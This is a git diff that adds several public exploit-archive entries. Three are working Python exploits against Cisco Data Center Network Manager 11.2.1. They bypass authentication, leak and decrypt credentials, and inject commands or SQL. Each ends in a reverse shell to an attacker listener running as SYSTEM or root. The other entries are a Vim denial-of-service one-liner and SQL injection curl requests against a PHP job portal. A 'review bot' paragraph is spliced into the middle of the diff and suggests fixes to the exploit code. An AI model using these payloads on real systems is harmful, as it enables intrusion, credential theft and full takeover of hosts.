diff --git a/exploits/java/webapps/48018.py b/exploits/java/webapps/48018.py
new file mode 100755
index 000000000..6da6093f6
--- /dev/null
+++ b/exploits/java/webapps/48018.py
@@ -0,0 +1,265 @@
+#!/usr/bin/python
+"""
+Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability
+
+Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
+- Release: 11.2(1)
+- Release Date: 18-Jun-2019
+- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
+- Size: 1619.36 MB (1698022100 bytes)
+- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
+
+Bug 1: CVE-2019-15975 / ZDI-20-003
+Bug 2: CVE-2019-15979 / ZDI-20-100
+
+Notes:
+======
+
+Si.java needs to be compiled against Java 8 (the target used 1.8u201):
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+public class Si {
+ static{
+ try {
+ String host = "192.168.100.159";
+ int port = 1337;
+ String cmd = "cmd.exe";
+ Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
+ Socket s = new Socket(host,port);
+ InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
+ OutputStream po = p.getOutputStream(), so = s.getOutputStream();
+ while(!s.isClosed()){
+ while(pi.available()>0){
+ so.write(pi.read());
+ }
+ while(pe.available()>0){
+ so.write(pe.read());
+ }
+ while(si.available()>0){
+ po.write(si.read());
+ }
+ so.flush();
+ po.flush();
+ Thread.sleep(50);
+ try {
+ p.exitValue();
+ break;
+ }catch (Exception e){}
+ }
+ p.destroy();
+ s.close();
+ }catch (IOException | InterruptedException e){ }
+ }
+}
+
+Example:
+========
+
+1. Modify the above Si.java to contain your connectback ip and port
+2. Compile the above Si.java class with Java 8 and store it in an attacker controlled share
+3. Launch the poc.py against your target using the share
+
+saturn:~ mr_me$ ./poc.py
+(+) usage: ./poc.py
+(+) eg: ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'
+
+saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'
+(+) attempting auth bypass 1
+(+) bypassed auth! added a global admin hacker:Hacked123
+(+) attempting to load class from \\vmware-host\Shared Folders\tools\Si.class
+(+) starting handler on port 1337
+(+) connection from 192.168.100.122
+(+) pop thy shell!
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
+whoami
+nt authority\system
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>
+"""
+
+import re
+import os
+import sys
+import time
+import base64
+import socket
+import requests
+import calendar
+import telnetlib
+from uuid import uuid4
+from threading import Thread
+from Crypto.Cipher import AES
+from xml.etree import ElementTree
+from datetime import datetime, timedelta
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+class AESCipher:
+ def __init__(self):
+
+ # Cisco's hardcoded key
+ self.key = "s91zEQmb305F!90a"
+ self.bs = 16
+
+ def _pad(self, s):
+ return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
+
+ def encrypt(self, raw):
+ raw = self._pad(raw)
+ iv = "\x00" * 0x10
+ cipher = AES.new(self.key, AES.MODE_CBC, iv)
+ return base64.b64encode(cipher.encrypt(raw))
+
+def make_raw_token(target):
+ """ craft our token """
+ key = "Source Incite"
+ uuid = str(uuid4()).replace("-","")[0:20]
+ time = leak_time(target)
+ return "%s-%s-%s" % (key, uuid, time)
+
+def bypass_auth(target, token, usr, pwd):
+ """ we use this primitive to fully bypass auth """
+ global user_added_already
+ d = {
+ "userName" : usr,
+ "password" : pwd,
+ "roleName" : "global-admin"
+ }
+ h = { "afw-token" : token }
+ uri = "https://%s/fm/fmrest/dbadmin/addUser" % target
+ r = requests.post(uri, data=d, headers=h, verify=False)
+ try:
+ json = r.json()
+ except ValueError:
+ return False
+ if json["resultMessage"] == "Success":
+ user_added_already = False
+ return True
+ elif json["resultMessage"] == "User already exists.":
+ user_added_already = True
+ return True
+ return False
+
+def leak_time(target):
+ """ leak the time from the server (not really needed) """
+ uri = "https://%s/" % target
+ r = requests.get(uri, verify=False)
+ r_time = datetime.strptime(r.headers['Date'][:-4], '%a, %d %b %Y %H:%M:%S')
+ return calendar.timegm(r_time.timetuple())
+
+def gen_token(target, usr, pwd):
+ """ this authenticates via the SOAP endpoint """
+ soap_body = ''
+ soap_body += '\t'
+ soap_body += '\t'
+ soap_body += '\t\t'
+ soap_body += '\t\t\t%s' % usr
+ soap_body += '\t\t\t%s' % pwd
+ soap_body += '\t\t\t100000'
+ soap_body += '\t\t'
+ soap_body += '\t'
+ soap_body += ''
+ uri = "https://%s/LogonWSService/LogonWS" % target
+ r = requests.post(uri, data=soap_body, verify=False)
+ tree = ElementTree.fromstring(r.content)
+ for elem in tree.iter():
+ if elem.tag == "return":
+ return elem.text
+ return False
+
+def craft_soap_header(target, usr, pwd):
+ """ this generates the soap header """
+ soap_header = '\t'
+ soap_header += '%s' % gen_token(target, usr, pwd)
+ soap_header += '\t'
+ return soap_header
+
+def load_remote_class(target, smb, usr, pwd):
+ """ this triggers the cmdi """
+ soap_body = ''
+ soap_body += craft_soap_header(target, usr, pwd)
+ soap_body += '\t'
+ soap_body += '\t\t'
+ soap_body += '\t\t\t" -providerclass Si -providerpath "%s' % smb
+ soap_body += '\t\t\t'
+ soap_body += '\t\t'
+ soap_body += '\t'
+ soap_body += ''
+ uri = "https://%s/SanWSService/SanWS" % target
+ r = requests.post(uri, data=soap_body, verify=False)
+ tree = ElementTree.fromstring(r.content)
+ for elem in tree.iter():
+ if elem.tag == "resultMessage":
+ if elem.text == "Success":
+ return True
+ return False
+
+def handler(lp):
+ print "(+) starting handler on port %d" % lp
+ t = telnetlib.Telnet()
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(("0.0.0.0", lp))
+ s.listen(1)
+ conn, addr = s.accept()
+ print "(+) connection from %s" % addr[0]
+ t.sock = conn
+ print "(+) pop thy shell!"
+ t.interact()
+
+def exec_code(t, lp, s, usr, pwd):
+ handlerthr = Thread(target=handler, args=(lp,))
+ handlerthr.start()
+ load_remote_class(t, s, usr, pwd)
+
+def main():
+ usr = "hacker"
+ pwd = "Hacked123"
+ if len(sys.argv) != 5:
+ print "(+) usage: %s " % sys.argv[0]
+ print "(+) eg: %s 192.168.100.122 192.168.100.159:1337 vmware-host '\\Shared Folders\\tools'" % sys.argv[0]
+ sys.exit(1)
+ t = sys.argv[1]
+ c = sys.argv[2]
+ s = "\\\\%s%s" % (sys.argv[3], sys.argv[4])
+ i = 0
+
+ if not ":" in c:
+ print "(+) using default connectback port 4444"
+ ls = c
+ lp = 4444
+ else:
+ if not c.split(":")[1].isdigit():
+ print "(-) %s is not a port number!" % cb.split(":")[1]
+ sys.exit(-1)
+ ls = c.split(":")[0]
+ lp = int(c.split(":")[1])
+
+ # InheritableThreadLocal.childValue performs a 'shallow copy' and causes a small race condition
+ while 1:
+ i += 1
+ print "(+) attempting auth bypass %d" % i
+ raw = make_raw_token(t)
+ cryptor = AESCipher()
+ token = cryptor.encrypt(raw)
+ if bypass_auth(t, token, usr, pwd):
+ if not user_added_already:
+ print "(+) bypassed auth! added a global admin %s:%s" % (usr, pwd)
+ else:
+ print "(+) we probably already bypassed auth! try the account %s:%s" % (usr, pwd)
+ break
+ sys.stdout.write('\x1b[1A')
+ sys.stdout.write('\x1b[2K')
+
+ # we have bypassed the authentication at this point
+ print "(+) attempting to load class from %s\\Si.class" % s
+ exec_code(t, lp, s, usr, pwd)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/java/webapps/48019.py b/exploits/java/webapps/48019.py
new file mode 100755
index 000000000..f689c0a1a
--- /dev/null
+++ b/exploits/java/webapps/48019.py
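Review bot: `main` references an undefined name in its port-validation branch — `print "(-) %s is not a port number!" % cb.split(":")[1]` — because the connectback argument is bound to `c` in this script, so a non-numeric port ends in a NameError instead of the intended message; the line should read `print "(-) %s is not a port number!" % c.split(":")[1]`. The module docstring also lacks a `Clean Up:` section like the one in 48019.py, even though the run leaves a persistent `global-admin` account behind (`hacker:Hacked123`, created by the `addUser` call in `bypass_auth`); a short list naming that account would tell whoever runs this in a lab what to remove afterwards. As a point of style, `make_raw_token` binds a local named `time`, which shadows the `time` module imported at the top of the file; `ts` or `epoch` would avoid the confusion. Indentation appears collapsed in this rendering of the hunk, so the Python block structure has to be inferred from context.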
@@ -0,0 +1,323 @@
+#!/usr/bin/python
+"""
+Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability
+
+Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
+- Release: 11.2(1)
+- Release Date: 18-Jun-2019
+- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
+- Size: 1619.36 MB (1698022100 bytes)
+- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
+
+Bug 1: CVE-2019-15976 / ZDI-20-008
+Bug 2: CVE-2019-15984 / ZDI-20-060
+
+Example:
+========
+
+saturn:~ mr_me$ ./poc.py
+(+) usage: ./poc.py
+(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337
+
+saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337
+(+) created the account hacker:Hacked123
+(+) created the 1337/custom path!
+(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c
+(+) SQL Injection working!
+(+) wrote the si.jsp shell!
+(+) cleaned up the database!
+(+) starting handler on port 1337
+(+) connection from 192.168.100.122
+(+) pop thy shell!
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
+whoami
+nt authority\system
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>
+
+Clean Up:
+=========
+
+1. delete from xmlDocs where user_name = '1337';
+2. delete si.jsp from the web root
+3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337
+"""
+
+import re
+import md5
+import sys
+import time
+import socket
+import base64
+import requests
+import telnetlib
+from threading import Thread
+from xml.etree import ElementTree
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def _get_jsp(cbh, cbp):
+ """ get me some jsp for a connectback! """
+ jsp = """
+ <%%@page import="java.lang.*"%%>
+ <%%@page import="java.util.*"%%>
+ <%%@page import="java.io.*"%%>
+ <%%@page import="java.net.*"%%>
+
+ <%%
+ // clean up
+ String[] files = {
+ "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml",
+ "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/",
+ "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/",
+ };
+ for (String s:files){ File f = new File(s); f.delete(); }
+ File f = new File(application.getRealPath("/" + this.getClass().getSimpleName().replaceFirst("_",".")));
+ f.delete();
+ class StreamConnector extends Thread
+ {
+ InputStream we;
+ OutputStream uo;
+
+ StreamConnector( InputStream we, OutputStream uo )
+ {
+ this.we = we;
+ this.uo = uo;
+ }
+
+ public void run()
+ {
+ BufferedReader dy = null;
+ BufferedWriter zvi = null;
+ try
+ {
+ dy = new BufferedReader( new InputStreamReader( this.we ) );
+ zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );
+ char buffer[] = new char[8192];
+ int length;
+ while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )
+ {
+ zvi.write( buffer, 0, length );
+ zvi.flush();
+ }
+ } catch( Exception e ){}
+ try
+ {
+ if( dy != null )
+ dy.close();
+ if( zvi != null )
+ zvi.close();
+ } catch( Exception e ){}
+ }
+ }
+
+ try
+ {
+ String ShellPath;
+ ShellPath = new String("cmd.exe");
+ Socket socket = new Socket( "%s", %s);
+ Process process = Runtime.getRuntime().exec( ShellPath );
+ ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
+ ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
+ } catch( Exception e ) {}
+ %%>
+ """ % (cbh, cbp)
+ return jsp
+
+def get_session(target, user, password):
+ """ we have bypassed auth at this point and created an admin """
+ d = {
+ "j_username" : user,
+ "j_password" : password
+ }
+ uri = "https://%s/j_spring_security_check" % target
+ r = requests.post(uri, data=d, verify=False, allow_redirects=False)
+ if "Set-Cookie" in r.headers:
+ match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,4}:.{44});", r.headers["Set-Cookie"])
+ if match:
+ sessionid = match.group(1)
+ resttoken = match.group(2)
+ return { "JSESSIONID" : sessionid, "resttoken": resttoken}
+ return False
+
+def craft_soap_header():
+ soap_header = '\t'
+ soap_header += '%s' % gen_ssotoken()
+ soap_header += '\t'
+ return soap_header
+
+def we_can_trigger_folder_path_creation(target):
+ """ craft the path location and db entry for the traversal """
+ soap_body = ''
+ soap_body += craft_soap_header()
+ soap_body += '\t'
+ soap_body += '\t\t'
+ soap_body += '\t\t\tsi'
+ soap_body += '\t\t\t1337'
+ soap_body += '\t\t\t'
+ soap_body += '\t\t\t1337'
+ soap_body += '\t\t'
+ soap_body += '\t'
+ soap_body += ''
+ uri = "https://%s/ReportWSService/ReportWS" % target
+ r = requests.post(uri, data=soap_body, verify=False)
+ if r.status_code == 200:
+ return True
+ return False
+
+def we_can_trigger_second_order_write(target, shellpath):
+ """ trigger the traversal """
+ soap_body = ''
+ soap_body += craft_soap_header()
+ soap_body += '\t'
+ soap_body += '\t\t'
+ soap_body += '\t\t\t%s' % shellpath
+ soap_body += '\t\t\t1337'
+ soap_body += '\t\t'
+ soap_body += '\t'
+ soap_body += ''
+ uri = "https://%s/ReportWSService/ReportWS" % target
+ r = requests.post(uri, data=soap_body, verify=False)
+ if r.status_code == 200:
+ return True
+ return False
+
+def gen_ssotoken():
+ """ auth bypass """
+ timestamp = 9999999999999 # we live forever
+ username = "hax" # doesnt even need to exist!
+ sessionid = 1337 # doesnt even need to exist!
+ d = "%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" % (username, sessionid, timestamp)
+ return "%d.%d.%s.%s" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)
+
+def we_can_trigger_sql_injection(target, sql):
+ """ stacked sqli primitive """
+ sqli = ";%s--" % sql
+ soap_body = ''
+ soap_body += craft_soap_header()
+ soap_body += '\t'
+ soap_body += '\t\t'
+ soap_body += '\t\t\t'
+ soap_body += '\t\t\t\tvcluster'
+ soap_body += '\t\t\t\t%s' % sqli
+ soap_body += '\t\t\t'
+ soap_body += '\t\t\t'
+ soap_body += '\t\t\t'
+ soap_body += '\t\t\tfalse'
+ soap_body += '\t\t'
+ soap_body += '\t'
+ soap_body += ''
+ uri = "https://%s/DbInventoryWSService/DbInventoryWS" % target
+ r = requests.post(uri, data=soap_body, verify=False)
+ if r.status_code == 200:
+ return True
+ return False
+
+def we_can_leak_vfs(target):
+ """ we use a information disclosure for the vfs path """
+ global vfs
+ uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
+ c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')
+ r = requests.get(uri, verify=False, auth=c)
+ match = re.search(r"temp\\(.{21}content-.{15,16})", r.text)
+ if match:
+ vfs = str(match.group(1).replace("\\","/"))
+ return True
+ return False
+
+def handler(lp):
+ """ this is the client handler, to catch the connectback """
+ print "(+) starting handler on port %d" % lp
+ t = telnetlib.Telnet()
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(("0.0.0.0", lp))
+ s.listen(1)
+ conn, addr = s.accept()
+ print "(+) connection from %s" % addr[0]
+ t.sock = conn
+ print "(+) pop thy shell!"
+ t.interact()
+
+def exec_code(t, usr, pwd, cbp):
+ """ this function threads the client handler and sends off the attacking payload """
+ handlerthr = Thread(target=handler, args=(int(cbp),))
+ handlerthr.start()
+ r = requests.get("https://%s/si.jsp" % t, cookies=get_session(t, usr, pwd), verify=False)
+
+def we_can_add_user(target, usr, pwd):
+ """ add a user so that we can reach our backdoor! """
+ soap_body = ''
+ soap_body += craft_soap_header()
+ soap_body += '\t'
+ soap_body += '\t\t'
+ soap_body += '\t\t\t%s' % usr
+ soap_body += '\t\t\t%s' % pwd
+ soap_body += '\t\t\tglobal-admin'
+ soap_body += '\t\t\tfalse'
+ soap_body += '\t\t'
+ soap_body += '\t'
+ soap_body += ''
+ uri = "https://%s/DbAdminWSService/DbAdminWS" % target
+ r = requests.post(uri, data=soap_body, verify=False)
+ tree = ElementTree.fromstring(r.content)
+ for elem in tree.iter():
+ if elem.tag == "resultMessage":
+ res = elem.text
+ if res == "Success":
+ return True
+ elif res == "User already exists.":
+ return True
+ return False
+
+def main():
+
+ usr = "hacker"
+ pwd = "Hacked123"
+
+ if len(sys.argv) != 3:
+ print "(+) usage: %s " % sys.argv[0]
+ print "(+) eg: %s 192.168.100.122 192.168.100.59:1337" % sys.argv[0]
+ sys.exit(1)
+
+ t = sys.argv[1]
+ c = sys.argv[2]
+
+ cbh = c.split(":")[0]
+ cbp = c.split(":")[1]
+ sc = _get_jsp(cbh, cbp).encode("hex")
+
+ # stage 1 - add a user
+ if we_can_add_user(t, usr, pwd):
+ print "(+) created the account %s:%s" % (usr, pwd)
+
+ # stage 2 - trigger folder creation and db entry
+ if we_can_trigger_folder_path_creation(t):
+ print "(+) created the 1337/custom path!"
+
+ # stage 3 - leak the vfs path (not really required I suppose)
+ if we_can_leak_vfs(t):
+ print "(+) leaked vfs! %s" % vfs
+
+ # stage 4 - trigger the sql injection to update our template entry
+ sp = "../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp" % vfs
+ sql = "update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';" % (sp, sc)
+ if we_can_trigger_sql_injection(t, sql):
+ print "(+) SQL Injection working!"
+
+ # stage 5 - trigger the shell write
+ if we_can_trigger_second_order_write(t, sp):
+ print "(+) wrote the si.jsp shell!"
+
+ # stage 6 - cleanup
+ sql = "delete from xmldocs where user_name='1337';"
+ if we_can_trigger_sql_injection(t, sql):
+ print "(+) cleaned up the database!"
+
+ # stage 7 - go get some rce
+ exec_code(t, usr, pwd, cbp)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/java/webapps/48020.py b/exploits/java/webapps/48020.py
new file mode 100755
index 000000000..d4e09caa9
--- /dev/null
+++ b/exploits/java/webapps/48020.py
@@ -0,0 +1,201 @@
+#!/usr/bin/python
+"""
+Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability
+
+Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal servers
+- Release: 11.2(1)
+- Release Date: 05-Jun-2019
+- FileName: dcnm-va.11.2.1.iso.zip
+- Size: 4473.54 MB (4690850167 bytes)
+- MD5 Checksum: b1bba467035a8b41c63802ce8666b7bb
+
+Bug 1: CVE-2019-15977 / ZDI-20-012
+Bug 2: CVE-2019-15977 / ZDI-20-013
+Bug 3: CVE-2019-15978 / ZDI-20-102
+
+Example:
+========
+
+saturn:~ mr_me$ ./poc.py
+(+) usage: ./poc.py
+(+) eg: ./poc.py 192.168.100.123 192.168.100.59
+(+) eg: ./poc.py 192.168.100.123 192.168.100.59:1337
+
+saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.59:1337
+(+) leaked user: root
+(+) leaked pass: Dcnmpass123
+(+) leaked vfs path: temp18206a94b7c45072/content-85ba056e1faec012
+(+) created a root session!
+(+) starting handler on port 1337
+(+) connection from 192.168.100.123
+(+) pop thy shell!
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux localhost 3.10.0-957.10.1.el7.x86_64 #1 SMP Mon Mar 18 15:06:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+"""
+
+import re
+import sys
+import random
+import socket
+import string
+import requests
+import telnetlib
+from threading import Thread
+from Crypto.Cipher import Blowfish
+from requests.auth import HTTPBasicAuth
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def handler(lp):
+ print "(+) starting handler on port %d" % lp
+ t = telnetlib.Telnet()
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(("0.0.0.0", lp))
+ s.listen(1)
+ conn, addr = s.accept()
+ print "(+) connection from %s" % addr[0]
+ t.sock = conn
+ print "(+) pop thy shell!"
+ t.interact()
+
+def exec_code(t, lp, s):
+ handlerthr = Thread(target=handler, args=(lp,))
+ handlerthr.start()
+ c = { "JSESSIONID" : sessionid }
+ r = requests.get("https://%s/%s" % (t, s), cookies=c, verify=False)
+
+def random_string(string_length = 8):
+ """ generate a random string of fixed length """
+ letters = string.ascii_lowercase
+ return ''.join(random.choice(letters) for i in range(string_length))
+
+def decrypt(key):
+ """ decrypt the leaked password """
+ cipher = Blowfish.new("jaas is the way", Blowfish.MODE_ECB)
+ msg = cipher.decrypt(key.decode("hex"))
+ return msg
+
+def we_can_leak(target):
+ """ used to bypass auth """
+ global dbuser, dbpass, vfspth, jdbc, rootuser, rootpass
+ dbuser = None
+ dbpass = None
+ vfspth = None
+ rootuser = None
+ rootpass = None
+ jdbc = None
+ uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
+ c = HTTPBasicAuth('admin', 'nbv_12345')
+ r = requests.get(uri, verify=False, auth=c)
+ leaked = r.text
+ match = re.search("db.password = #(.*)", leaked)
+ if match:
+ dbpass = match.group(1)
+ match = re.search("db.user = (.*)", leaked)
+ if match:
+ dbuser = match.group(1)
+ match = re.search("dcnmweb = (.*)", leaked)
+ if match:
+ vfspth = match.group(1)
+ match = re.search("db.url = (.*)", leaked)
+ if match:
+ jdbc = match.group(1)
+ match = re.search("server.sftp.password = #(.*)", leaked)
+ if match:
+ rootpass = match.group(1)
+ match = re.search("server.sftp.username = (.*)", leaked)
+ if match:
+ rootuser = match.group(1)
+ if dbuser and dbpass and vfspth and jdbc and rootuser and rootpass:
+ return True
+ return False
+
+def we_can_login(target, password):
+ """ we have bypassed auth at this point by leaking the creds """
+ global sessionid, resttoken
+ d = {
+ "j_username" : rootuser,
+ "j_password" : password,
+ }
+ uri = "https://%s/j_spring_security_check" % target
+ r = requests.post(uri, data=d, verify=False, allow_redirects=False)
+ if "Set-Cookie" in r.headers:
+ match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,3}:.{44});", r.headers["Set-Cookie"])
+ if match:
+ sessionid = match.group(1)
+ resttoken = match.group(2)
+ return True
+ return False
+
+def pop_a_root_shell(t, ls, lp):
+ """ get dat shell! """
+ handlerthr = Thread(target=handler, args=(lp,))
+ handlerthr.start()
+ uri = "https://%s/rest/fabrics" % t
+ cmdi = "%s\";'`{ruby,-rsocket,-e'c=TCPSocket.new(\"%s\",\"%d\");" % (random_string(), ls, lp)
+ cmdi += "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print(io.read)}end'}`'\""
+ j = {
+ "name" : cmdi,
+
+ # this is needed to pass validate() on line 149 of the LanFabricImpl class
+ "generalSetting" : {
+ "asn" : "1337",
+ "provisionOption" : "Manual"
+ },
+ "provisionSetting" : {
+ "dhcpSetting": {
+ "primarySubnet" : "127.0.0.1",
+ "primaryDNS" : "127.0.0.1",
+ "secondaryDNS" : "127.0.0.1"
+ },
+ "ldapSetting" : {
+ "server" : "127.0.0.1"
+ },
+ "amqpSetting" : {
+ "server" : "127.0.0.1:1337"
+ }
+ }
+ }
+ c = { "resttoken": resttoken }
+ r = requests.post(uri, json=j, cookies=c, verify=False)
+ if r.status_code == 200 and ls in r.text:
+ return True
+ return False
+
+def main():
+ if len(sys.argv) != 3:
+ print "(+) usage: %s " % sys.argv[0]
+ print "(+) eg: %s 192.168.100.123 192.168.100.59" % sys.argv[0]
+ print "(+) eg: %s 192.168.100.123 192.168.100.59:1337" % sys.argv[0]
+ sys.exit(1)
+ t = sys.argv[1]
+ cb = sys.argv[2]
+ if not ":" in cb:
+ print "(+) using default connectback port 4444"
+ ls = cb
+ lp = 4444
+ else:
+ if not cb.split(":")[1].isdigit():
+ print "(-) %s is not a port number!" % cb.split(":")[1]
+ sys.exit(-1)
+ ls = cb.split(":")[0]
+ lp = int(cb.split(":")[1])
+
+ # stage 1 - leak the creds
+ if we_can_leak(t):
+ pwd = re.sub(r'[^\x20-\x7F]+','', decrypt(rootpass))
+ print "(+) leaked user: %s" % rootuser
+ print "(+) leaked pass: %s" % pwd
+ print "(+) leaked vfs path: %s" % "/".join(vfspth.split("/")[10:])
+
+ # stage 2 - get a valid sesson
+ if we_can_login(t, pwd):
+ print "(+) created a root session!"
+
+ # stage 3 - get a root shell via cmdi
+ pop_a_root_shell(t, ls, lp)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/linux/dos/48008.txt b/exploits/linux/dos/48008.txt
new file mode 100644
index 000000000..fc1a68748
--- /dev/null
+++ b/exploits/linux/dos/48008.txt
@@ -0,0 +1,11 @@
+# Exploit Title: VIM 8.2 - Denial of Service (PoC)
+# Date: 2019-12-17
+# Vulnerability: DoS
+# Vulnerability Discovery: Dhiraj Mishra
+# Vulnerable Version: VIM - Vi IMproved 8.2 (Included patches: 1-131)
+# Vendor Homepage: https://www.vim.org/
+# References:
+# https://github.com/vim/vim/commit/98a336dd497d3422e7efeef9f24cc9e25aeb8a49
+# Invalid memory access with search command
+
+PoC: vim --clean -e -s -c 'exe "norm /\x80PS"'
\ No newline at end of file
diff --git a/exploits/php/webapps/48007.txt b/exploits/php/webapps/48007.txt
new file mode 100644
index 000000000..a479a4bdd
--- /dev/null
+++ b/exploits/php/webapps/48007.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Online Job Portal 1.0 - 'user_email' SQL Injection
+# Dork: N/A
+# Date: 2020-02-06
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC:
+# 1)
+#
+curl -i -s -k -X $'POST' \
+ -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 282' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+ -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
+ --data-binary $'user_email=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20VerAyari&user_pass=0x5665724179617269&btnLogin=0x5665724179617269' \
+ $'http://localhost/[PATH]/admin/login.php'
+#
+HTTP/1.1 200 OK
+Date: Wed, 05 Feb 2020 19:18:45 GMT
+Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
+X-Powered-By: PHP/5.6.40
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 3251
+Connection: close
+Content-Type: text/html; charset=UTF-8
+.............
+
+Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
+#
+
+# POC:
+# 2)
+#
+curl -i -s -k -X $'POST' \
+ -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 237' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+ -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
+ --data-binary $'USERNAME=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20verayari&PASS=VerAyari' \
+ $'http://localhost/[PATH]/process.php?action=login'
+#
+HTTP/1.1 200 OK
+Date: Wed, 05 Feb 2020 19:17:19 GMT
